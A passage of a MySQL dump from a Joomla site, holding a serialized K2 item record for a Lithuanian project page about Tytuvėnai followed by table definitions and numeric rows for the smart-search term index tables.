User\";s:6:\"layout\";s:4:\"item\";s:4:\"path\";s:86:\"index.php/lankytini-objektai/item/26-projektas-tytuvenu-iveiklinimas-ir-aktualizavimas\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"K2 Item\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"K2 Item\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:11:\"K2 Category\";a:1:{s:11:\"Latest News\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:11:\"Latest News\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:39:\"index.php?option=com_k2&view=item&id=26\";s:5:\"route\";s:100:\"index.php?option=com_k2&view=item&id=26:projektas-tytuvenu-iveiklinimas-ir-aktualizavimas&Itemid=290\";s:5:\"title\";s:52:\"Projektas Tytuvėnų įveiklinimas ir aktualizavimas\";s:11:\"description\";s:0:\"\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2025-04-01 09:29:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2025-04-01 06:17:08\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:1;}');
/*!40000 ALTER TABLE `xyhmu_finder_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_terms0`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_terms0`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_terms0` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_terms0`
--

LOCK TABLES `xyhmu_finder_links_terms0` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_terms0` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_links_terms0` VALUES (1,85,0.28),(1,86,1.09669),(1,87,1.30669),(1,88,0.79992),(2,88,0.79992),(3,88,0.79992),(4,88,0.79992),(5,88,0.79992),(6,88,0.79992),(1,89,3.19992),(2,89,3.19992),(3,89,3.19992),(4,89,3.19992),(5,89,3.19992),(6,89,3.19992),(2,129,0.37331),(3,129,0.37331),(4,129,0.37331),(5,129,0.37331),(2,130,0.95669),(3,130,0.95669),(4,130,0.95669),(5,130,0.95669),(2,131,1.09669),(3,131,1.09669),(4,131,1.09669),(5,131,1.09669),(2,132,0.09331),(3,132,0.09331),(4,132,0.09331),(5,132,0.09331),(2,133,0.88669),(3,133,0.88669),(4,133,0.88669),(5,133,0.88669),(2,134,1.05),(3,134,1.05),(4,134,1.05),(5,134,1.05),(2,135,0.46669),(3,135,0.46669),(4,135,0.46669),(5,135,0.46669),(2,136,1.05),(3,136,1.05),(4,136,1.05),(5,136,1.05),(2,137,1.14331),(3,137,1.14331),(4,137,1.14331),(5,137,1.14331),(2,138,0.32669),(3,138,0.32669),(4,138,0.32669),(5,138,0.32669),(2,139,0.98),(3,139,0.98),(4,139,0.98),(5,139,0.98),(2,140,1.19),(3,140,1.19),(4,140,1.19),(5,140,1.19),(2,141,0.32669),(3,141,0.32669),(4,141,0.32669),(5,141,0.32669),(2,142,0.93331),(3,142,0.93331),(4,142,0.93331),(5,142,0.93331),(2,143,1.00331),(3,143,1.00331),(4,143,1.00331),(5,143,1.00331),(2,144,0.18669),(3,144,0.18669),(4,144,0.18669),(5,144,0.18669),(2,145,1.09669),(3,145,1.09669),(4,145,1.09669),(5,145,1.09669),(2,146,1.35331),(3,146,1.35331),(4,146,1.35331),(5,146,1.35331),(2,147,1.0666),(2,148,0.09331),(3,148,0.09331),(4,148,0.09331),(5,148,0.09331),(2,149,0.86331),(3,149,0.86331),(4,149,0.86331),(5,149,0.86331),(2,150,0.98),(3,150,0.98),(4,150,0.98),(5,150,0.98),(2,151,0.23331),(3,151,0.23331),(4,151,0.23331),(5,151,0.23331),(2,152,0.93331),(3,152,0.93331),(4,152,0.93331),(5,152,0.93331),(2,153,1.09669),(3,153,1.09669),(4,153,1.09669),(5,153,1.09669),(2,154,0.23331),(3,154,0.23331),(4,154,0.23331),(5,154,0.23331),(2,155,0.91),(3,155,0.91),(4,155,0.91),(5,155,0.91),(2,156,1.00331),(3,156,1.00331),(4,156,1.00331),(5,156,1.00331),(2,328,0.14),(3,328,0.88),(4,328,0.88),(5,328,0.88),(2,329,0.88669),(3,329,0.88669),(4,329,0.88669),(5,329,0.88669),(2,330,1.07331),(3,330,1.07331),(4,330,1.07331),(5,330,1.07331),(2,331,0.45339),(2,332,2.09661),(2,333,0.34),(2,334,2.09661),(2,335,2.38),(2,336,0.14),(3,336,0.14),(4,336,0.14),(5,336,0.14),(2,337,0.88669),(3,337,0.88669),(4,337,0.88669),(5,337,0.88669),(2,338,1.19),(3,338,1.19),(4,338,1.19),(5,338,1.19),(2,339,0.37331),(3,339,0.37331),(4,339,0.37331),(5,339,0.37331),(2,340,1.09669),(3,340,1.09669),(4,340,1.09669),(5,340,1.09669),(2,341,1.21331),(3,341,1.21331),(4,341,1.21331),(5,341,1.21331),(3,640,0.24679),(5,640,0.24679),(3,641,4.56321),(3,642,4.93321),(3,643,2.71321),(4,643,2.71321),(5,643,2.71321),(3,644,5.67321),(4,644,5.67321),(5,644,5.67321),(3,645,6.16679),(4,645,6.16679),(5,645,6.16679),(3,646,0.74),(3,647,4.93321),(3,648,6.16679),(3,673,4.44),(4,673,4.44),(5,673,4.44),(3,674,5.42679),(4,674,5.42679),(5,674,5.42679),(5,734,4.31679),(5,735,5.42679),(5,755,0.1334),(5,756,2.4),(5,757,2.6),(5,758,2.22),(5,759,5.42679),(5,760,6.90679),(6,762,3.45321);
/*!40000 ALTER TABLE `xyhmu_finder_links_terms0` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_terms1`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_terms1`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_terms1` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_terms1`
--

LOCK TABLES `xyhmu_finder_links_terms1` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_terms1` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_finder_links_terms1` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_terms2`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_terms2`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_terms2` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_terms2`
--

LOCK TABLES `xyhmu_finder_links_terms2` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_terms2` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_links_terms2` VALUES (1,41,0.51331),(1,42,1.19),(1,43,1.4),(1,44,0.46669),(1,45,1.14331),(1,46,1.4),(1,47,0.46669),(1,48,1.14331),(1,49,1.4),(1,50,0.48),(3,50,0.48),(4,50,0.48),(5,50,0.48),(6,50,0.48),(2,50,1.28),(1,51,1.64004),(3,51,1.64004),(4,51,1.64004),(5,51,1.64004),(6,51,1.64004),(2,51,4.37344),(1,52,0.46669),(2,257,0.42),(3,257,0.42),(4,257,0.42),(5,257,0.42),(2,258,0.98),(3,258,0.98),(4,258,0.98),(5,258,0.98),(2,259,1.21331),(3,259,1.21331),(4,259,1.21331),(5,259,1.21331),(2,277,0.32669),(3,277,0.32669),(4,277,0.32669),(5,277,0.32669),(2,278,1.02669),(3,278,1.02669),(4,278,1.02669),(5,278,1.02669),(2,279,1.16669),(3,279,1.16669),(4,279,1.16669),(5,279,1.16669),(2,280,3.3334),(2,281,0.37331),(3,281,0.37331),(4,281,0.37331),(5,281,0.37331),(2,282,1.00331),(3,282,1.00331),(4,282,1.00331),(5,282,1.00331),(2,283,1.07331),(3,283,1.07331),(4,283,1.07331),(5,283,1.07331),(2,284,0.23331),(3,284,0.23331),(4,284,0.23331),(5,284,0.23331),(2,285,0.95669),(3,285,0.95669),(4,285,0.95669),(5,285,0.95669),(2,286,1.09669),(3,286,1.09669),(4,286,1.09669),(5,286,1.09669),(2,287,0.37331),(3,287,0.37331),(4,287,0.37331),(5,287,0.37331),(2,288,1.02669),(3,288,1.02669),(4,288,1.02669),(5,288,1.02669),(2,289,1.21331),(3,289,1.21331),(4,289,1.21331),(5,289,1.21331);
/*!40000 ALTER TABLE `xyhmu_finder_links_terms2` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_terms3`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_terms3`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_terms3` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_terms3`
--

LOCK TABLES `xyhmu_finder_links_terms3` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_terms3` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_finder_links_terms3` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_terms4`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_terms4`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_terms4` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_terms4`
--

LOCK TABLES `xyhmu_finder_links_terms4` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_terms4` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_links_terms4` VALUES (1,11,1.72679),(1,12,5.67321),(1,13,6.78321),(1,14,0.37331),(1,15,1.07331),(1,16,1.16669),(1,82,0.28),(1,83,1.07331),(1,84,1.4),(2,160,0.68),(2,161,2.32339),(2,162,2.55),(2,163,0.32669),(3,163,0.32669),(4,163,0.32669),(5,163,0.32669),(2,164,1.09669),(3,164,1.09669),(4,164,1.09669),(5,164,1.09669),(2,165,1.21331),(3,165,1.21331),(4,165,1.21331),(5,165,1.21331),(2,166,0.56),(3,166,0.56),(4,166,0.56),(5,166,0.56),(2,167,1.23669),(3,167,1.23669),(4,167,1.23669),(5,167,1.23669),(2,168,1.35331),(3,168,1.35331),(4,168,1.35331),(5,168,1.35331),(2,169,0.84),(3,169,0.84),(4,169,0.84),(5,169,0.84),(2,170,1.02669),(3,170,1.02669),(4,170,1.02669),(5,170,1.02669),(2,171,1.16669),(3,171,1.16669),(4,171,1.16669),(5,171,1.16669),(2,172,1.00331),(3,172,1.00331),(4,172,1.00331),(5,172,1.00331),(2,173,1.14331),(3,173,1.14331),(4,173,1.14331),(5,173,1.14331),(4,706,2.46679),(4,707,5.79679),(4,708,6.41321);
/*!40000 ALTER TABLE `xyhmu_finder_links_terms4` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_terms5`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_terms5`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_terms5` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_terms5`
--

LOCK TABLES `xyhmu_finder_links_terms5` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_terms5` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_finder_links_terms5` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_terms6`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_terms6`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_terms6` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_terms6`
--

LOCK TABLES `xyhmu_finder_links_terms6` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_terms6` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_links_terms6` VALUES (1,53,0.42),(1,54,1.07331),(1,55,1.30669),(2,290,0.23331),(3,290,0.23331),(4,290,0.23331),(5,290,0.23331),(2,291,1.00331),(3,291,1.00331),(4,291,1.00331),(5,291,1.00331),(2,292,1.12),(3,292,1.12),(4,292,1.12),(5,292,1.12),(2,293,0.23331),(3,293,0.23331),(4,293,0.23331),(5,293,0.23331),(2,294,0.98),(3,294,0.98),(4,294,0.98),(5,294,0.98),(2,295,1.09669),(3,295,1.09669),(4,295,1.09669),(5,295,1.09669),(2,296,0.37331),(3,296,0.37331),(4,296,0.37331),(5,296,0.37331),(2,297,1.12),(3,297,1.12),(4,297,1.12),(5,297,1.12),(2,298,1.21331),(3,298,1.21331),(4,298,1.21331),(5,298,1.21331),(5,741,1.97321),(5,742,5.92),(5,743,6.53679);
/*!40000 ALTER TABLE `xyhmu_finder_links_terms6` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_terms7`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_terms7`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_terms7` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_terms7`
--

LOCK TABLES `xyhmu_finder_links_terms7` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_terms7` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_links_terms7` VALUES (1,56,0.32004),(3,56,0.32004),(4,56,0.32004),(5,56,0.32004),(6,56,0.32004),(2,56,0.85344),(1,102,0.64008),(2,102,0.64008),(3,102,0.64008),(4,102,0.64008),(5,102,0.64008),(6,102,0.64008),(2,299,2.8666),(2,300,0.18669),(3,300,0.18669),(4,300,0.18669),(5,300,0.18669),(2,301,0.98),(3,301,0.98),(4,301,0.98),(5,301,0.98),(2,302,1.21331),(3,302,1.21331),(4,302,1.21331),(5,302,1.21331),(2,303,0.18669),(3,303,0.18669),(4,303,0.18669),(5,303,0.18669),(2,304,0.86331),(3,304,0.86331),(4,304,0.86331),(5,304,0.86331),(2,305,1.05),(3,305,1.05),(4,305,1.05),(5,305,1.05),(2,306,0.32669),(3,306,0.32669),(4,306,0.32669),(5,306,0.32669),(2,307,0.98),(3,307,0.98),(4,307,0.98),(5,307,0.98),(2,308,1.16669),(3,308,1.16669),(4,308,1.16669),(5,308,1.16669),(2,309,0.32669),(3,309,0.32669),(4,309,0.32669),(5,309,0.32669),(2,310,1.02669),(3,310,1.02669),(4,310,1.02669),(5,310,1.02669),(2,311,1.19),(3,311,1.19),(4,311,1.19),(5,311,1.19),(2,312,0.46662),(3,312,0.46662),(4,312,0.46662),(5,312,0.46662),(2,313,1.02669),(3,313,1.02669),(4,313,1.02669),(5,313,1.02669),(2,314,1.05),(3,314,1.05),(4,314,1.05),(5,314,1.05),(2,315,1.12),(3,315,1.12),(4,315,1.12),(5,315,1.12),(2,322,0.14),(3,322,0.14),(4,322,0.14),(5,322,0.14),(2,323,0.95669),(3,323,0.95669),(4,323,0.95669),(5,323,0.95669),(2,324,1.16669),(3,324,1.16669),(4,324,1.16669),(5,324,1.16669),(2,325,0.18669),(3,325,0.18669),(4,325,0.18669),(5,325,0.18669),(2,326,0.98),(3,326,0.98),(4,326,0.98),(5,326,0.98),(2,327,1.14331),(3,327,1.14331),(4,327,1.14331),(5,327,1.14331),(2,351,0.51331),(3,351,0.51331),(4,351,0.51331),(5,351,0.51331),(2,352,1.16669),(3,352,1.16669),(4,352,1.16669),(5,352,1.16669),(2,353,1.37669),(3,353,1.37669),(4,353,1.37669),(5,353,1.37669),(2,354,0.27993),(3,354,0.27993),(4,354,0.27993),(5,354,0.27993),(2,355,0.93331),(3,355,0.93331),(4,355,0.93331),(5,355,0.93331),(2,356,1.00331),(3,356,1.00331),(4,356,1.00331),(5,356,1.00331),(2,357,0.93331),(3,357,0.93331),(4,357,0.93331),(5,357,0.93331),(2,358,1.09669),(3,358,1.09669),(4,358,1.09669),(5,358,1.09669),(2,359,0.86331),(3,359,0.86331),(4,359,0.86331),(5,359,0.86331),(2,360,0.98),(3,360,0.98),(4,360,0.98),(5,360,0.98),(3,664,1.23321),(3,665,4.68679),(3,666,5.30321),(3,667,2.22),(3,668,6.29),(3,669,6.90679),(4,718,2.46679),(4,719,6.29),(4,720,7.15321),(5,744,0.74),(5,745,5.18),(5,746,6.41321);
/*!40000 ALTER TABLE `xyhmu_finder_links_terms7` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_terms8`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_terms8`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_terms8` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_terms8`
--

LOCK TABLES `xyhmu_finder_links_terms8` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_terms8` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_links_terms8` VALUES (1,3,0.21),(1,4,0.81669),(1,5,1.07331),(1,17,0.04669),(1,18,0.98),(1,19,1.14331),(1,20,2.34652),(1,21,1.14331),(1,22,5.79679),(1,23,3.7334),(1,24,3.34339),(1,25,0.37331),(1,26,1.16669),(1,27,1.4),(1,28,0.6666),(2,28,0.6666),(3,28,0.6666),(4,28,0.6666),(5,28,0.6666),(6,28,0.6666),(1,29,0.09331),(6,29,0.49321),(1,30,1.07331),(1,31,1.30669),(1,32,0.32004),(2,32,0.32004),(3,32,0.32004),(4,32,0.32004),(5,32,0.32004),(6,32,0.32004),(1,33,0.15996),(2,33,0.15996),(3,33,0.15996),(4,33,0.15996),(5,33,0.15996),(6,33,0.15996),(1,34,1.47996),(2,34,1.47996),(3,34,1.47996),(4,34,1.47996),(5,34,1.47996),(6,34,1.47996),(1,35,0.28),(1,36,1.00331),(1,37,1.30669),(1,38,0.28),(1,39,1.14331),(1,40,1.4),(1,63,0.56),(1,64,1.23669),(1,65,1.4),(1,66,2.34652),(1,67,3.1334),(1,68,3.3334),(1,69,4.00008),(1,70,1.33),(1,71,0.60669),(1,72,1.23669),(1,73,1.4),(1,74,2.64),(1,75,5.79679),(1,76,6.90679),(1,77,1.12),(1,78,1.30669),(1,79,0.46669),(1,80,1.09669),(1,81,1.26),(2,174,0.32669),(3,174,0.32669),(4,174,0.32669),(5,174,0.32669),(2,175,1.00331),(3,175,1.00331),(4,175,1.00331),(5,175,1.00331),(2,176,1.12),(3,176,1.12),(4,176,1.12),(5,176,1.12),(2,177,0.18669),(3,177,0.18669),(4,177,0.18669),(5,177,0.18669),(2,178,0.98),(3,178,0.98),(4,178,0.98),(5,178,0.98),(2,179,1.09669),(3,179,1.09669),(4,179,1.09669),(5,179,1.09669),(2,180,0.42),(3,180,0.42),(4,180,0.42),(5,180,0.42),(2,181,1.00331),(3,181,1.00331),(4,181,1.00331),(5,181,1.00331),(2,182,1.19),(3,182,1.19),(4,182,1.19),(5,182,1.19),(2,183,0.46662),(3,183,0.46662),(4,183,0.46662),(5,183,0.46662),(2,184,0.88669),(3,184,0.88669),(4,184,0.88669),(5,184,0.88669),(2,185,1.12),(3,185,1.12),(4,185,1.12),(5,185,1.12),(2,186,0.91),(3,186,0.91),(4,186,0.91),(5,186,0.91),(2,187,1.02669),(3,187,1.02669),(4,187,1.02669),(5,187,1.02669),(2,188,0.84),(3,188,0.84),(4,188,0.84),(5,188,0.84),(2,189,0.91),(3,189,0.91),(4,189,0.91),(5,189,0.91),(2,190,1.09669),(3,190,1.09669),(4,190,1.09669),(5,190,1.09669),(2,191,0.98),(3,191,0.98),(4,191,0.98),(5,191,0.98),(2,192,1.16669),(3,192,1.16669),(4,192,1.16669),(5,192,1.16669),(2,193,0.91),(3,193,0.91),(4,193,0.91),(5,193,0.91),(2,194,1.09669),(3,194,1.09669),(4,194,1.09669),(5,194,1.09669),(2,195,0.37338),(3,195,0.37338),(4,195,0.37338),(5,195,0.37338),(2,196,0.93331),(3,196,0.93331),(4,196,0.93331),(5,196,0.93331),(2,197,1.02669),(3,197,1.02669),(4,197,1.02669),(5,197,1.02669),(2,198,0.95669),(3,198,0.95669),(4,198,0.95669),(5,198,0.95669),(2,199,1.02669),(3,199,1.02669),(4,199,1.02669),(5,199,1.02669),(2,238,0.37331),(3,238,0.37331),(4,238,0.37331),(5,238,0.37331),(2,239,0.42),(3,239,0.42),(4,239,0.42),(5,239,0.42),(2,240,0.98),(3,240,0.98),(4,240,0.98),(5,240,0.98),(2,241,1.09669),(3,241,1.09669),(4,241,1.09669),(5,241,1.09669),(2,242,0.45339),(2,243,2.15339),(2,244,2.38),(2,245,0.45339),(2,246,2.32339),(2,247,2.60661),(2,248,0.32669),(3,248,0.32669),(4,248,0.32669),(5,248,0.32669),(2,249,1.00331),(3,249,1.00331),(4,249,1.00331),(5,249,1.00331),(2,250,1.21331),(3,250,1.21331),(4,250,1.21331),(5,250,1.21331),(2,251,0.32669),(3,251,0.32669),(4,251,0.32669),(5,251,0.32669),(2,252,1.00331),(3,252,1.00331),(4,252,1.00331),(5,252,1.00331),(2,253,1.23669),(3,253,1.23669),(4,253,1.23669),(5,253,1.23669),(2,254,0.34),(2,255,2.15339),(2,256,2.32339),(2,260,0.23331),(3,260,0.23331),(4,260,0.23331),(5,260,0.23331),(2,261,0.98),(3,261,0.98),(4,261,0.98),(5,261,0.98),(2,262,1.05),(3,262,1.05),(4,262,1.05),(5,262,1.05),(2,263,0.18662),(3,263,0.18662),(4,263,0.18662),(5,263,0.67983),(2,264,0.98),(3,264,0.98),(4,264,0.98),(5,264,0.98),(2,265,1.05),(3,265,1.05),(4,265,1.05),(5,265,1.05),(2,266,0.98),(3,266,0.98),(4,266,0.98),(5,266,0.98),(2,267,1.12),(3,267,1.12),(4,267,1.12),(5,267,1.12),(2,268,0.23331),(3,268,0.23331),(4,268,0.23331),(5,268,0.23331),(2,269,0.95669),(3,269,0.95669),(4,269,0.95669),(5,269,0.95669),(2,270,1.05),(3,270,1.05),(4,270,1.05),(5,270,1.05),(2,271,0.28),(3,271,0.28),(4,271,0.28),(5,271,0.28),(2,272,0.98),(3,272,0.98),(4,272,0.98),(5,272,0.98),(2,273,1.05),(3,273,1.05),(4,273,1.05),(5,273,1.05),(2,274,0.23331),(3,274,0.23331),(4,274,0.23331),(5,274,0.23331),(2,275,0.93331),(3,275,0.93331),(4,275,0.93331),(5,275,0.93331),(2,276,1.16669),(3,276,1.16669),(4,276,1.16669),(5,276,1.16669),(2,319,0.37331),(3,319,0.37331),(4,319,0.37331),(5,319,0.37331),(2,320,1.09669),(3,320,1.09669),(4,320,1.09669),(5,320,1.09669),(2,321,1.23669),(3,321,1.23669),(4,321,1.23669),(5,321,1.23669),(3,649,0.98679),(3,650,4.93321),(3,651,5.42679),(3,652,1.48),(3,653,5.67321),(3,654,7.15321),(3,655,0.49321),(4,655,0.49321),(5,655,0.49321),(3,656,4.93321),(4,656,4.93321),(5,656,4.93321),(3,657,5.79679),(4,657,5.79679),(5,657,5.79679),(3,658,1.23321),(3,659,4.81),(3,660,5.67321),(4,709,1.23321),(4,710,4.93321),(4,711,6.41321),(5,736,0.98679),(5,737,5.67321),(5,738,6.29),(5,739,4.19321),(5,740,4.68679),(5,752,0.98679),(5,753,4.56321),(5,754,4.81),(6,763,5.79679),(6,764,1.6),(6,765,3),(6,766,4),(6,767,2.22),(6,768,5.92),(6,769,7.4);
/*!40000 ALTER TABLE `xyhmu_finder_links_terms8` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_terms9`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_terms9`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_terms9` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_terms9`
--

LOCK TABLES `xyhmu_finder_links_terms9` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_terms9` DISABLE KEYS */;
